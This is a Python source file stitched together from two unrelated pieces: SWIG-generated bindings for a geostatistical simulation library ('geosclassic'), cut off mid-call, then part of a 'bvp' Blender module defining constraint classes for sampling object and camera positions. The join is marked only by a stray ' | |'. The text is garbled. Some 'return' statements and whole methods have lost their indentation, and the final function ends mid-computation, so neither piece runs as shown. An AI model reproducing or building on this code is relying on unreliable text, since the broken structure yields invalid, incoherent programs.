        varianceValue = _swig_property(_geosclassic.mpds_geosClassicInput_varianceValue_get, _geosclassic.mpds_geosClassicInput_varianceValue_set)
    __swig_setmethods__["varianceImage"] = _geosclassic.mpds_geosClassicInput_varianceImage_set
    __swig_getmethods__["varianceImage"] = _geosclassic.mpds_geosClassicInput_varianceImage_get
    if _newclass:
        varianceImage = _swig_property(_geosclassic.mpds_geosClassicInput_varianceImage_get, _geosclassic.mpds_geosClassicInput_varianceImage_set)
    __swig_setmethods__["nGibbsSamplerPath"] = _geosclassic.mpds_geosClassicInput_nGibbsSamplerPath_set
    __swig_getmethods__["nGibbsSamplerPath"] = _geosclassic.mpds_geosClassicInput_nGibbsSamplerPath_get
    if _newclass:
        nGibbsSamplerPath = _swig_property(_geosclassic.mpds_geosClassicInput_nGibbsSamplerPath_get, _geosclassic.mpds_geosClassicInput_nGibbsSamplerPath_set)
    __swig_setmethods__["seed"] = _geosclassic.mpds_geosClassicInput_seed_set
    __swig_getmethods__["seed"] = _geosclassic.mpds_geosClassicInput_seed_get
    if _newclass:
        seed = _swig_property(_geosclassic.mpds_geosClassicInput_seed_get, _geosclassic.mpds_geosClassicInput_seed_set)
    __swig_setmethods__["seedIncrement"] = _geosclassic.mpds_geosClassicInput_seedIncrement_set
    __swig_getmethods__["seedIncrement"] = _geosclassic.mpds_geosClassicInput_seedIncrement_get
    if _newclass:
        seedIncrement = _swig_property(_geosclassic.mpds_geosClassicInput_seedIncrement_get, _geosclassic.mpds_geosClassicInput_seedIncrement_set)
    __swig_setmethods__["nrealization"] = _geosclassic.mpds_geosClassicInput_nrealization_set
    __swig_getmethods__["nrealization"] = _geosclassic.mpds_geosClassicInput_nrealization_get
    if _newclass:
        nrealization = _swig_property(_geosclassic.mpds_geosClassicInput_nrealization_get, _geosclassic.mpds_geosClassicInput_nrealization_set)

    def __init__(self):
        """Allocate a new underlying C struct and bind it to this proxy."""
        this = _geosclassic.new_mpds_geosClassicInput()
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    # SWIG uses __swig_destroy__ to free the C struct when the proxy dies.
    __swig_destroy__ = _geosclassic.delete_mpds_geosClassicInput
    __del__ = lambda self: None
# Register the proxy class with the SWIG runtime so C-level results are
# wrapped as mpds_geosClassicInput instances.
mpds_geosClassicInput_swigregister = _geosclassic.mpds_geosClassicInput_swigregister
mpds_geosClassicInput_swigregister(mpds_geosClassicInput)
class mpds_geosClassicIndicatorInput(_object):
    """SWIG proxy class for the C struct MPDS_GEOSCLASSICINDICATORINPUT.

    Generated boilerplate: each struct field registers its C setter/getter
    in __swig_setmethods__/__swig_getmethods__ and, on new-style class
    builds (_newclass), is also exposed as a Python property.
    Do not edit by hand; regenerate with SWIG.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, mpds_geosClassicIndicatorInput, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, mpds_geosClassicIndicatorInput, name)
    __repr__ = _swig_repr
    __swig_setmethods__["consoleAppFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_consoleAppFlag_set
    __swig_getmethods__["consoleAppFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_consoleAppFlag_get
    if _newclass:
        consoleAppFlag = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_consoleAppFlag_get, _geosclassic.mpds_geosClassicIndicatorInput_consoleAppFlag_set)
    __swig_setmethods__["simName"] = _geosclassic.mpds_geosClassicIndicatorInput_simName_set
    __swig_getmethods__["simName"] = _geosclassic.mpds_geosClassicIndicatorInput_simName_get
    if _newclass:
        simName = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_simName_get, _geosclassic.mpds_geosClassicIndicatorInput_simName_set)
    __swig_setmethods__["simGrid"] = _geosclassic.mpds_geosClassicIndicatorInput_simGrid_set
    __swig_getmethods__["simGrid"] = _geosclassic.mpds_geosClassicIndicatorInput_simGrid_get
    if _newclass:
        simGrid = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_simGrid_get, _geosclassic.mpds_geosClassicIndicatorInput_simGrid_set)
    __swig_setmethods__["varName"] = _geosclassic.mpds_geosClassicIndicatorInput_varName_set
    __swig_getmethods__["varName"] = _geosclassic.mpds_geosClassicIndicatorInput_varName_get
    if _newclass:
        varName = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_varName_get, _geosclassic.mpds_geosClassicIndicatorInput_varName_set)
    __swig_setmethods__["formatString"] = _geosclassic.mpds_geosClassicIndicatorInput_formatString_set
    __swig_getmethods__["formatString"] = _geosclassic.mpds_geosClassicIndicatorInput_formatString_get
    if _newclass:
        formatString = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_formatString_get, _geosclassic.mpds_geosClassicIndicatorInput_formatString_set)
    __swig_setmethods__["ncategory"] = _geosclassic.mpds_geosClassicIndicatorInput_ncategory_set
    __swig_getmethods__["ncategory"] = _geosclassic.mpds_geosClassicIndicatorInput_ncategory_get
    if _newclass:
        ncategory = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_ncategory_get, _geosclassic.mpds_geosClassicIndicatorInput_ncategory_set)
    __swig_setmethods__["categoryValue"] = _geosclassic.mpds_geosClassicIndicatorInput_categoryValue_set
    __swig_getmethods__["categoryValue"] = _geosclassic.mpds_geosClassicIndicatorInput_categoryValue_get
    if _newclass:
        categoryValue = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_categoryValue_get, _geosclassic.mpds_geosClassicIndicatorInput_categoryValue_set)
    __swig_setmethods__["outputMode"] = _geosclassic.mpds_geosClassicIndicatorInput_outputMode_set
    __swig_getmethods__["outputMode"] = _geosclassic.mpds_geosClassicIndicatorInput_outputMode_get
    if _newclass:
        outputMode = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_outputMode_get, _geosclassic.mpds_geosClassicIndicatorInput_outputMode_set)
    __swig_setmethods__["outputImageFileName"] = _geosclassic.mpds_geosClassicIndicatorInput_outputImageFileName_set
    __swig_getmethods__["outputImageFileName"] = _geosclassic.mpds_geosClassicIndicatorInput_outputImageFileName_get
    if _newclass:
        outputImageFileName = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_outputImageFileName_get, _geosclassic.mpds_geosClassicIndicatorInput_outputImageFileName_set)
    __swig_setmethods__["outputReportFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_outputReportFlag_set
    __swig_getmethods__["outputReportFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_outputReportFlag_get
    if _newclass:
        outputReportFlag = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_outputReportFlag_get, _geosclassic.mpds_geosClassicIndicatorInput_outputReportFlag_set)
    __swig_setmethods__["outputReportFileName"] = _geosclassic.mpds_geosClassicIndicatorInput_outputReportFileName_set
    __swig_getmethods__["outputReportFileName"] = _geosclassic.mpds_geosClassicIndicatorInput_outputReportFileName_get
    if _newclass:
        outputReportFileName = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_outputReportFileName_get, _geosclassic.mpds_geosClassicIndicatorInput_outputReportFileName_set)
    __swig_setmethods__["computationMode"] = _geosclassic.mpds_geosClassicIndicatorInput_computationMode_set
    __swig_getmethods__["computationMode"] = _geosclassic.mpds_geosClassicIndicatorInput_computationMode_get
    if _newclass:
        computationMode = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_computationMode_get, _geosclassic.mpds_geosClassicIndicatorInput_computationMode_set)
    __swig_setmethods__["covModel"] = _geosclassic.mpds_geosClassicIndicatorInput_covModel_set
    __swig_getmethods__["covModel"] = _geosclassic.mpds_geosClassicIndicatorInput_covModel_get
    if _newclass:
        covModel = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_covModel_get, _geosclassic.mpds_geosClassicIndicatorInput_covModel_set)
    __swig_setmethods__["searchRadiusRelative"] = _geosclassic.mpds_geosClassicIndicatorInput_searchRadiusRelative_set
    __swig_getmethods__["searchRadiusRelative"] = _geosclassic.mpds_geosClassicIndicatorInput_searchRadiusRelative_get
    if _newclass:
        searchRadiusRelative = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_searchRadiusRelative_get, _geosclassic.mpds_geosClassicIndicatorInput_searchRadiusRelative_set)
    __swig_setmethods__["nneighborMax"] = _geosclassic.mpds_geosClassicIndicatorInput_nneighborMax_set
    __swig_getmethods__["nneighborMax"] = _geosclassic.mpds_geosClassicIndicatorInput_nneighborMax_get
    if _newclass:
        nneighborMax = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_nneighborMax_get, _geosclassic.mpds_geosClassicIndicatorInput_nneighborMax_set)
    __swig_setmethods__["searchNeighborhoodSortMode"] = _geosclassic.mpds_geosClassicIndicatorInput_searchNeighborhoodSortMode_set
    __swig_getmethods__["searchNeighborhoodSortMode"] = _geosclassic.mpds_geosClassicIndicatorInput_searchNeighborhoodSortMode_get
    if _newclass:
        searchNeighborhoodSortMode = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_searchNeighborhoodSortMode_get, _geosclassic.mpds_geosClassicIndicatorInput_searchNeighborhoodSortMode_set)
    __swig_setmethods__["ndataImage"] = _geosclassic.mpds_geosClassicIndicatorInput_ndataImage_set
    __swig_getmethods__["ndataImage"] = _geosclassic.mpds_geosClassicIndicatorInput_ndataImage_get
    if _newclass:
        ndataImage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_ndataImage_get, _geosclassic.mpds_geosClassicIndicatorInput_ndataImage_set)
    __swig_setmethods__["dataImage"] = _geosclassic.mpds_geosClassicIndicatorInput_dataImage_set
    __swig_getmethods__["dataImage"] = _geosclassic.mpds_geosClassicIndicatorInput_dataImage_get
    if _newclass:
        dataImage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_dataImage_get, _geosclassic.mpds_geosClassicIndicatorInput_dataImage_set)
    __swig_setmethods__["ndataPointSet"] = _geosclassic.mpds_geosClassicIndicatorInput_ndataPointSet_set
    __swig_getmethods__["ndataPointSet"] = _geosclassic.mpds_geosClassicIndicatorInput_ndataPointSet_get
    if _newclass:
        ndataPointSet = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_ndataPointSet_get, _geosclassic.mpds_geosClassicIndicatorInput_ndataPointSet_set)
    __swig_setmethods__["dataPointSet"] = _geosclassic.mpds_geosClassicIndicatorInput_dataPointSet_set
    __swig_getmethods__["dataPointSet"] = _geosclassic.mpds_geosClassicIndicatorInput_dataPointSet_get
    if _newclass:
        dataPointSet = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_dataPointSet_get, _geosclassic.mpds_geosClassicIndicatorInput_dataPointSet_set)
    __swig_setmethods__["maskImageFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_maskImageFlag_set
    __swig_getmethods__["maskImageFlag"] = _geosclassic.mpds_geosClassicIndicatorInput_maskImageFlag_get
    if _newclass:
        maskImageFlag = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_maskImageFlag_get, _geosclassic.mpds_geosClassicIndicatorInput_maskImageFlag_set)
    __swig_setmethods__["maskImage"] = _geosclassic.mpds_geosClassicIndicatorInput_maskImage_set
    __swig_getmethods__["maskImage"] = _geosclassic.mpds_geosClassicIndicatorInput_maskImage_get
    if _newclass:
        maskImage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_maskImage_get, _geosclassic.mpds_geosClassicIndicatorInput_maskImage_set)
    __swig_setmethods__["probabilityUsage"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityUsage_set
    __swig_getmethods__["probabilityUsage"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityUsage_get
    if _newclass:
        probabilityUsage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_probabilityUsage_get, _geosclassic.mpds_geosClassicIndicatorInput_probabilityUsage_set)
    __swig_setmethods__["probabilityValue"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityValue_set
    __swig_getmethods__["probabilityValue"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityValue_get
    if _newclass:
        probabilityValue = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_probabilityValue_get, _geosclassic.mpds_geosClassicIndicatorInput_probabilityValue_set)
    __swig_setmethods__["probabilityImage"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityImage_set
    __swig_getmethods__["probabilityImage"] = _geosclassic.mpds_geosClassicIndicatorInput_probabilityImage_get
    if _newclass:
        probabilityImage = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_probabilityImage_get, _geosclassic.mpds_geosClassicIndicatorInput_probabilityImage_set)
    __swig_setmethods__["seed"] = _geosclassic.mpds_geosClassicIndicatorInput_seed_set
    __swig_getmethods__["seed"] = _geosclassic.mpds_geosClassicIndicatorInput_seed_get
    if _newclass:
        seed = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_seed_get, _geosclassic.mpds_geosClassicIndicatorInput_seed_set)
    __swig_setmethods__["seedIncrement"] = _geosclassic.mpds_geosClassicIndicatorInput_seedIncrement_set
    __swig_getmethods__["seedIncrement"] = _geosclassic.mpds_geosClassicIndicatorInput_seedIncrement_get
    if _newclass:
        seedIncrement = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_seedIncrement_get, _geosclassic.mpds_geosClassicIndicatorInput_seedIncrement_set)
    __swig_setmethods__["nrealization"] = _geosclassic.mpds_geosClassicIndicatorInput_nrealization_set
    __swig_getmethods__["nrealization"] = _geosclassic.mpds_geosClassicIndicatorInput_nrealization_get
    if _newclass:
        nrealization = _swig_property(_geosclassic.mpds_geosClassicIndicatorInput_nrealization_get, _geosclassic.mpds_geosClassicIndicatorInput_nrealization_set)

    def __init__(self):
        """Allocate a new underlying C struct and bind it to this proxy."""
        this = _geosclassic.new_mpds_geosClassicIndicatorInput()
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    # SWIG uses __swig_destroy__ to free the C struct when the proxy dies.
    __swig_destroy__ = _geosclassic.delete_mpds_geosClassicIndicatorInput
    __del__ = lambda self: None
# Register the proxy class with the SWIG runtime so C-level results are
# wrapped as mpds_geosClassicIndicatorInput instances.
mpds_geosClassicIndicatorInput_swigregister = _geosclassic.mpds_geosClassicIndicatorInput_swigregister
mpds_geosClassicIndicatorInput_swigregister(mpds_geosClassicIndicatorInput)
# --- SWIG-generated module-level wrappers for the input structs. ---
# Each Python def is immediately rebound to the raw C entry point on the
# line after it, so the def bodies only serve as introspectable stubs.
def MPDSGeosClassicFreeGeosClassicInput(arg1):
    return _geosclassic.MPDSGeosClassicFreeGeosClassicInput(arg1)
MPDSGeosClassicFreeGeosClassicInput = _geosclassic.MPDSGeosClassicFreeGeosClassicInput

def MPDSGeosClassicFreeGeosClassicIndicatorInput(arg1):
    return _geosclassic.MPDSGeosClassicFreeGeosClassicIndicatorInput(arg1)
MPDSGeosClassicFreeGeosClassicIndicatorInput = _geosclassic.MPDSGeosClassicFreeGeosClassicIndicatorInput

def MPDSGeosClassicInitGeosClassicInput(arg1):
    return _geosclassic.MPDSGeosClassicInitGeosClassicInput(arg1)
MPDSGeosClassicInitGeosClassicInput = _geosclassic.MPDSGeosClassicInitGeosClassicInput

def MPDSGeosClassicInitGeosClassicIndicatorInput(arg1):
    return _geosclassic.MPDSGeosClassicInitGeosClassicIndicatorInput(arg1)
MPDSGeosClassicInitGeosClassicIndicatorInput = _geosclassic.MPDSGeosClassicInitGeosClassicIndicatorInput

def MPDSGeosClassicPrintGeosClassicInput(arg1, arg2, arg3):
    return _geosclassic.MPDSGeosClassicPrintGeosClassicInput(arg1, arg2, arg3)
MPDSGeosClassicPrintGeosClassicInput = _geosclassic.MPDSGeosClassicPrintGeosClassicInput

def MPDSGeosClassicPrintGeosClassicIndicatorInput(arg1, arg2, arg3):
    return _geosclassic.MPDSGeosClassicPrintGeosClassicIndicatorInput(arg1, arg2, arg3)
MPDSGeosClassicPrintGeosClassicIndicatorInput = _geosclassic.MPDSGeosClassicPrintGeosClassicIndicatorInput

def MPDSGeosClassicPrintVersion(arg1, arg2, arg3, arg4, arg5):
    return _geosclassic.MPDSGeosClassicPrintVersion(arg1, arg2, arg3, arg4, arg5)
MPDSGeosClassicPrintVersion = _geosclassic.MPDSGeosClassicPrintVersion

def MPDSGeosClassicValidateGeosClassicInput(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8):
    return _geosclassic.MPDSGeosClassicValidateGeosClassicInput(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8)
MPDSGeosClassicValidateGeosClassicInput = _geosclassic.MPDSGeosClassicValidateGeosClassicInput

def MPDSGeosClassicValidateGeosClassicIndicatorInput(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8):
    return _geosclassic.MPDSGeosClassicValidateGeosClassicIndicatorInput(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8)
MPDSGeosClassicValidateGeosClassicIndicatorInput = _geosclassic.MPDSGeosClassicValidateGeosClassicIndicatorInput
class mpds_geosClassicOutput(_object):
    """SWIG proxy class for the C struct MPDS_GEOSCLASSICOUTPUT.

    Generated boilerplate exposing the single struct field 'outputImage'.
    Do not edit by hand; regenerate with SWIG.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, mpds_geosClassicOutput, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, mpds_geosClassicOutput, name)
    __repr__ = _swig_repr
    __swig_setmethods__["outputImage"] = _geosclassic.mpds_geosClassicOutput_outputImage_set
    __swig_getmethods__["outputImage"] = _geosclassic.mpds_geosClassicOutput_outputImage_get
    if _newclass:
        outputImage = _swig_property(_geosclassic.mpds_geosClassicOutput_outputImage_get, _geosclassic.mpds_geosClassicOutput_outputImage_set)

    def __init__(self):
        """Allocate a new underlying C struct and bind it to this proxy."""
        this = _geosclassic.new_mpds_geosClassicOutput()
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    # SWIG uses __swig_destroy__ to free the C struct when the proxy dies.
    __swig_destroy__ = _geosclassic.delete_mpds_geosClassicOutput
    __del__ = lambda self: None
# Register the proxy class with the SWIG runtime so C-level results are
# wrapped as mpds_geosClassicOutput instances.
mpds_geosClassicOutput_swigregister = _geosclassic.mpds_geosClassicOutput_swigregister
mpds_geosClassicOutput_swigregister(mpds_geosClassicOutput)
# --- SWIG-generated module-level wrappers for output handling and the
# simulation/estimation entry points. As above, each Python def is
# immediately rebound to the raw C entry point on the following line.
def MPDSGeosClassicFreeGeosClassicOutput(arg1):
    return _geosclassic.MPDSGeosClassicFreeGeosClassicOutput(arg1)
MPDSGeosClassicFreeGeosClassicOutput = _geosclassic.MPDSGeosClassicFreeGeosClassicOutput

def MPDSGeosClassicInitGeosClassicOutput(arg1):
    return _geosclassic.MPDSGeosClassicInitGeosClassicOutput(arg1)
MPDSGeosClassicInitGeosClassicOutput = _geosclassic.MPDSGeosClassicInitGeosClassicOutput

def MPDSGeosClassicBuildSearchNeighborhoodForCovModel(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18):
    return _geosclassic.MPDSGeosClassicBuildSearchNeighborhoodForCovModel(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18)
MPDSGeosClassicBuildSearchNeighborhoodForCovModel = _geosclassic.MPDSGeosClassicBuildSearchNeighborhoodForCovModel

def MPDSGeosClassicIndicatorIntegrateConditioningData(arg1, arg2, arg3, arg4, arg5, arg6):
    return _geosclassic.MPDSGeosClassicIndicatorIntegrateConditioningData(arg1, arg2, arg3, arg4, arg5, arg6)
MPDSGeosClassicIndicatorIntegrateConditioningData = _geosclassic.MPDSGeosClassicIndicatorIntegrateConditioningData

def MPDSGeosClassicIntegrateConditioningData(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8):
    return _geosclassic.MPDSGeosClassicIntegrateConditioningData(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8)
MPDSGeosClassicIntegrateConditioningData = _geosclassic.MPDSGeosClassicIntegrateConditioningData

def MPDSSGeosClassicPrepareSimulationPath(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9):
    return _geosclassic.MPDSSGeosClassicPrepareSimulationPath(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9)
MPDSSGeosClassicPrepareSimulationPath = _geosclassic.MPDSSGeosClassicPrepareSimulationPath

def MPDSGeosClassicSim(arg1, arg2, arg3, arg4):
    return _geosclassic.MPDSGeosClassicSim(arg1, arg2, arg3, arg4)
MPDSGeosClassicSim = _geosclassic.MPDSGeosClassicSim

def MPDSGeosClassicIndicatorSim(arg1, arg2, arg3, arg4):
    return _geosclassic.MPDSGeosClassicIndicatorSim(arg1, arg2, arg3, arg4)
MPDSGeosClassicIndicatorSim = _geosclassic.MPDSGeosClassicIndicatorSim

def MPDSGeosClassicIndicatorSimEstimation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21):
    return _geosclassic.MPDSGeosClassicIndicatorSimEstimation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21)
MPDSGeosClassicIndicatorSimEstimation = _geosclassic.MPDSGeosClassicIndicatorSimEstimation

def MPDSGeosClassicIndicatorSimSimulation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21, arg22):
    return _geosclassic.MPDSGeosClassicIndicatorSimSimulation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21, arg22)
MPDSGeosClassicIndicatorSimSimulation = _geosclassic.MPDSGeosClassicIndicatorSimSimulation

def MPDSGeosClassicSimEstimation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21):
    return _geosclassic.MPDSGeosClassicSimEstimation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21)
MPDSGeosClassicSimEstimation = _geosclassic.MPDSGeosClassicSimEstimation
def MPDSGeosClassicSimEstimationUniqueSN(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14):
return _geosclassic.MPDSGeosClassicSimEstimationUniqueSN(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14)
MPDSGeosClassicSimEstimationUniqueSN = _geosclassic.MPDSGeosClassicSimEstimationUniqueSN
def MPDSGeosClassicSimSimulation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, arg16, arg17, arg18, arg19, arg20, arg21, arg22, arg23, arg24, arg25, arg26):
return _geosclassic.MPDSGeosClassicSimSimulation(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10, arg11, arg12, arg13, arg14, arg15, | |
"""
Class for general constraints on random distributions.
"""
# Imports
import sys
import copy
import numpy as np
import bvp.utils as bvpu
from bvp.Classes.object import Object # Should this be here...? Unclear.
verbosity_level = 3
class Constraint(object):
    """General class to hold constraints on position, etc."""

    def __init__(self, X=None):
        """General constraints (Mean, Std, Min, Max) on random distributions
        (rectangular or normal).

        See sample_w_constr() for usage. Superordinate class for
        PosConstraint, ObConstraint, CamConstraint.
        """
        self.X = X

    def sample_w_constr(self, mu=None, sigma=None, mn=None, mx=None):
        """Get a random sample given mean, std, min, max.

        Parameters
        ----------
        mu : scalar or None
            mean of distribution; if None, a uniform draw on [mn, mx] is used
        sigma : scalar or None
            standard deviation of distribution (defaults to 1.0 if None)
        mn : scalar or None
            minimum of distribution
        mx : scalar or None
            maximum of distribution

        Returns
        -------
        scalar sample x with mn <= x <= mx.

        Raises
        ------
        ValueError
            if mu is None and either bound is missing. (The original code
            only raised when all three of mu/mn/mx were None; supplying a
            single bound crashed inside numpy with an opaque TypeError.)

        Notes
        -----
        If mu is None, returns a uniform random sample, mn <= x <= mx.
        Otherwise returns x ~ N(mu, sigma), clipped to [mn, mx]; note that
        clipping (rather than re-sampling) piles probability mass onto the
        bounds.
        """
        if mu is None:
            # A uniform draw needs both bounds to be present.
            if mn is None or mx is None:
                raise ValueError('Insufficient constraints specified')
            return np.random.uniform(low=mn, high=mx)
        # Normal draw: substitute open bounds / default spread as needed.
        if mx is None:
            mx = np.inf
        if mn is None:
            mn = -np.inf
        if sigma is None:
            sigma = 1.0
        n = np.random.normal(loc=mu, scale=sigma)
        return np.clip(n, mn, mx)
class PosConstraint(Constraint):
    """General constraint on 3D position."""

    def __init__(self, X=None, Y=None, Z=None, theta=None, phi=None, r=None, origin=(0., 0., 0.)):
        """Store 3D position constraints for objects / cameras / whatever in Blender.

        Every input (X, Y, ...) is a 4-element tuple (Mean, Std, Min, Max).
        Rectangular constraints use X, Y, Z only; spherical constraints use
        theta, phi, r only. XYZ constraints, if present, override spherical ones.
        """
        super(PosConstraint, self).__init__(X)
        # Explicit attribute assignment (the original looped over locals()).
        self.X = X
        self.Y = Y
        self.Z = Z
        self.theta = theta
        self.phi = phi
        self.r = r
        self.origin = origin

    def sampleXYZ(self):
        """Sample one position (X, Y, Z) given the spherical / XYZ constraints.

        Rectangular (XYZ) constraints take precedence over spherical ones
        when both are present.
        """
        if not self.X and not self.theta:
            raise Exception('Ya hafta provide either rectangular or spherical constraints on the distribution of positions!')
        if self.X:
            # Rectangular constraints.
            x = self.sample_w_constr(*self.X)
            y = self.sample_w_constr(*self.Y)
            z = self.sample_w_constr(*self.Z)
        else:
            # Spherical constraints. NOTE: theta is used as azimuth and phi as
            # elevation here, which may be swapped relative to convention.
            theta_offset = 270  # makes angles in Blender more interpretable
            if self.theta:
                theta = self.sample_w_constr(*self.theta) + theta_offset
            else:
                theta = np.random.rand() * 360.
            phi = self.sample_w_constr(*self.phi)
            r = self.sample_w_constr(*self.r)
            x, y, z = bvpu.math.sph2cart(r, theta, phi)  # theta, phi in degrees
            x += self.origin[0]
            y += self.origin[1]
            z += self.origin[2]
        return x, y, z
class ObConstraint(PosConstraint):
"""Constraints on objects, specifically"""
def __init__(self, X=None, Y=None, Z=None,
             theta=(None, None, 0., 360.), phi=(0., 0., 0., 0.), r=(0., 5., -25., 25.),
             origin=(0., 0., 0.), sz=(6., 1., 3., 10.), Zrot=(None, None, -180., 180.)):
    """Store 3D position (and size/rotation) constraints for objects.

    All inputs (X, Y, ...) are 4-element sequences: (Mean, Std, Min, Max).
    Rectangular constraints use X, Y, Z only; spherical constraints use
    theta, phi, r only. `sz` constrains object size and `Zrot` the rotation
    about the z axis.
    """
    self.type = 'ObConstraint'
    super(ObConstraint, self).__init__(X=X, Y=Y, Z=Z, theta=theta, phi=phi, r=r, origin=origin)
    # Explicit attribute assignment (the original looped over locals()).
    self.X = X
    self.Y = Y
    self.Z = Z
    self.theta = theta
    self.phi = phi
    self.r = r
    self.origin = origin
    self.sz = sz
    self.Zrot = Zrot
def checkXYZS_3D(self, Ob, Obst=None, CheckBounds=True):
    """Verify that an object's position and size are acceptable in 3D.

    Checks the object against this constraint's X / Y / Z / r bounds
    (when CheckBounds is True) and against a list of obstacle objects.

    Parameters
    ----------
    Ob : object being placed; must expose min_xyz_pos, max_xyz_pos,
        size3D and collides_with().
    Obst : optional list of "Object" instances giving obstacle positions.
    CheckBounds : whether to test the boundary constraints at all.

    Returns
    -------
    BGboundOK_3D : list of booleans [X_OK, Y_OK, Z_OK, r_OK]; True where
        the object lies within that bound.
    ObDstOK_3D : list of booleans, one per obstacle; True where the object
        does not collide with it.
    """
    # (1) Check distance from allowable object position boundaries (X, Y, and/or r)
    BGboundOK_3D = [True, True, True, True]
    if CheckBounds:
        minXYZpos = Ob.min_xyz_pos
        maxXYZpos = Ob.max_xyz_pos
        Sz = Ob.size3D
        tolerance_factor = 5
        X_OK, Y_OK, r_OK, Z_OK = True, True, True, True  # True by default
        # TODO: What is the correct way to take object size into account?
        if self.X:
            xA = True if self.X[2] is None else (minXYZpos[0] >= self.X[2])
            xB = True if self.X[3] is None else (maxXYZpos[0] <= self.X[3])
            X_OK = xA and xB
        if self.Y:
            yA = True if self.Y[2] is None else (minXYZpos[1] >= self.Y[2])
            yB = True if self.Y[3] is None else (maxXYZpos[1] <= self.Y[3])
            Y_OK = yA and yB
        if self.Z:
            if self.Z[2] == self.Z[3]:
                # Degenerate (flat) Z constraint: allow a little slack below,
                # and let the object extend above up to the max allowed size.
                zA = True if self.Z[2] is None else (minXYZpos[2] >= self.Z[2] - Sz / tolerance_factor)
                # BUG FIX: the original read `self.Sz[3]`, but the constructor
                # stores the size constraint as `sz`, so that line raised
                # AttributeError whenever this branch was taken.
                zB = True if self.Z[2] is None else (maxXYZpos[2] <= self.Z[3] + self.sz[3] - Sz)
            else:
                zA = True if self.Z[2] is None else (minXYZpos[2] >= self.Z[2] - Sz / tolerance_factor)
                zB = True if self.Z[3] is None else (maxXYZpos[2] <= self.Z[3])
            Z_OK = (zA and zB)
        if self.r:
            oX, oY, oZ = self.origin
            maxR = ((maxXYZpos[0] - oX)**2 + (maxXYZpos[1] - oY)**2 + (maxXYZpos[2] - oZ)**2)**.5
            minR = ((minXYZpos[0] - oX)**2 + (minXYZpos[1] - oY)**2 + (minXYZpos[2] - oZ)**2)**.5
